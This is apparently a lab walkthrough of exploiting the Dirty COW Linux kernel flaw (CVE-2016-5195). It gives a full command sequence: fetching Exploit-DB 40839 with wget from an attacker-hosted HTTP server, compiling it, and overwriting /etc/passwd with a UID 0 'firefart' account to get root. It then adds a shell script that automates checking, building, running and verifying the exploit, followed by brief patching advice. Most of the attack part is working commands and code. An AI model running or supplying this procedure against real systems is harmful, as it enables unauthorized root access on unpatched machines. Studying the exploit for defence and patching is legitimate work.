Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka "Dirty COW."

  • An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
  • This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

Affected systems: Linux kernel 2.x through 4.x before 4.8.3

https://nvd.nist.gov/vuln/detail/CVE-2016-5195

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195

Exploit

1. Check whether the host is vulnerable to Dirty COW

  • ./linux-exploit-suggester

Output on the host used in this walkthrough:

Kernel version: 3.2.0

Exploit status: Highly probable

The suggester matches on the kernel version string only. Distributions backport the fix into kernels that keep an older version number, so "Highly probable" means the exploit is worth trying, not that the host is confirmed vulnerable.

2. Download the exploit

The exploit used below is Exploit-DB 40839 (dirty.c by FireFart, https://www.exploit-db.com/exploits/40839). It is built on the original proof of concept, which its header credits:

// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):

// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c

3. Upload the exploit to the target machine

Serve the file from the attacking host (10.10.14.14 here) and fetch it from the target:

  • python -m SimpleHTTPServer 9990 (Python 2; with Python 3 use python3 -m http.server 9990)

  • wget http://10.10.14.14:9990/40839

4. The compile instruction is in the header comments of the file

  • Read the header, which contains the compile line
    • cat 40839
  • Rename the file so gcc treats it as C source
    • mv 40839 dirty.c
  • gcc -pthread dirty.c -o dirty -lcrypt
  • ls -l dirty

5. Run the exploit

  • ./dirty

It prompts "Please enter the new password:" (the password can also be passed as the first argument, e.g. ./dirty 123456). The exploit backs up /etc/passwd to /tmp/passwd.bak and then uses the COW race to write a line for a UID 0 user named firefart, carrying the chosen password hash, over the start of the read-only /etc/passwd.

6. Test the exploit by switching to the new user with su

  • su firefart
    • 123456 (the password entered in step 5)

  • head -n 5 /etc/passwd

The firefart entry has UID 0 and GID 0, so it is a root-equivalent account (id shows uid=0). su accepts the password because the hash is stored directly in the second field of /etc/passwd rather than in /etc/shadow.

The new line was written over the original root entry, so once the root shell is no longer needed restore the backup the exploit left behind:

  • mv /tmp/passwd.bak /etc/passwd
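The procedure above collected into one shell helper, added here as an example. It is not the page's own script and not part of dirty.c (EDB-ID 40839), which it only builds and invokes. It assumes dirty.c is already in the working directory, gcc and libcrypt are installed, and the exploit's default user name firefart is unchanged; the 4.8.3 threshold is the mainline fix version from the advisory, treated as a hint only because distributions backport the fix.

```shell
#!/bin/sh
# Added helper wrapping steps 1 and 4-6 plus the restore. Not part of the
# page and not FireFart's dirty.c (EDB-ID 40839); it only drives that exploit.
# Assumptions: dirty.c is in the current directory, gcc and libcrypt are
# installed, and the exploit's default user name "firefart" is unchanged.
set -u

FIXED_VERSION="4.8.3"   # first mainline release carrying the CVE-2016-5195 fix

# Field-by-field numeric compare of dotted kernel versions ("3.2.0-4-amd64"
# is read as 3.2.0). Returns 0 (true) when $1 is strictly older than $2.
version_lt() {
    a="$1"; b="$2"; i=1
    while [ "$i" -le 3 ]; do
        x=$(printf '%s' "$a" | cut -d. -f"$i" | sed 's/[^0-9].*//')
        y=$(printf '%s' "$b" | cut -d. -f"$i" | sed 's/[^0-9].*//')
        x=${x:-0}; y=${y:-0}
        [ "$x" -lt "$y" ] && return 0
        [ "$x" -gt "$y" ] && return 1
        i=$((i + 1))
    done
    return 1
}

# Step 1, version hint only. Distributions backport the fix into kernels
# with older version numbers, so "possibly vulnerable" has to be confirmed
# by actually running the exploit.
check_kernel_version() {
    running=$(uname -r)
    if version_lt "$running" "$FIXED_VERSION"; then
        echo "kernel $running is below $FIXED_VERSION: possibly vulnerable (backports exist, confirm)"
        return 0
    fi
    echo "kernel $running is $FIXED_VERSION or newer: mainline fix present"
    return 1
}

# Steps 4-5: build with the flags from the exploit header and run it.
# dirty.c takes the new password as argv[1], backs up /etc/passwd to
# /tmp/passwd.bak and overwrites the start of the file with a UID 0
# "firefart" line.
build_and_run_exploit() {
    [ -f dirty.c ] || { echo "dirty.c not found in $(pwd)" >&2; return 1; }
    gcc -pthread dirty.c -o dirty -lcrypt || return 1
    ./dirty "$1"
}

# Step 6 check on a single passwd line: is the third field (UID) 0?
passwd_line_is_root() {
    [ "$(printf '%s' "$1" | cut -d: -f3)" = "0" ]
}

# Step 6 on a whole file (default /etc/passwd): print every UID 0 user.
# After a successful run "firefart" shows up here.
list_uid0_users() {
    awk -F: '$3 == 0 { print $1 }' "${1:-/etc/passwd}"
}

# Put the original file back (needs root, so run it from the firefart
# shell). The exploit clobbered the root entry, so do not skip this.
restore_passwd() {
    [ -f /tmp/passwd.bak ] || { echo "no backup at /tmp/passwd.bak" >&2; return 1; }
    mv /tmp/passwd.bak /etc/passwd
}

# Dispatcher: with no argument the script only defines the functions.
case "${1-}" in
    check)   check_kernel_version ;;
    exploit) build_and_run_exploit "${2:-123456}" ;;
    verify)  list_uid0_users ;;
    restore) restore_passwd ;;
    *) ;;
esac
```

Usage on the target, with the script saved as dirtycow-helper.sh next to dirty.c: `sh dirtycow-helper.sh check`, then `sh dirtycow-helper.sh exploit 123456`, `sh dirtycow-helper.sh verify` to list UID 0 accounts, and from the firefart shell `sh dirtycow-helper.sh restore` before leaving. The version function is deliberately kept separate from the exploit so the same comparison can be used on a list of uname strings gathered from many hosts.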

Solution

The fix is in mainline Linux 4.8.3 (commit "mm: remove gup_flags FOLL_WRITE games from __get_user_pages()") and was backported to the stable series and to distribution kernels; update the kernel package and reboot. Because of those backports the version string alone does not show whether a distribution kernel is patched: check the distribution's advisory for CVE-2016-5195, or run the proof of concept against a read-only test file, to confirm.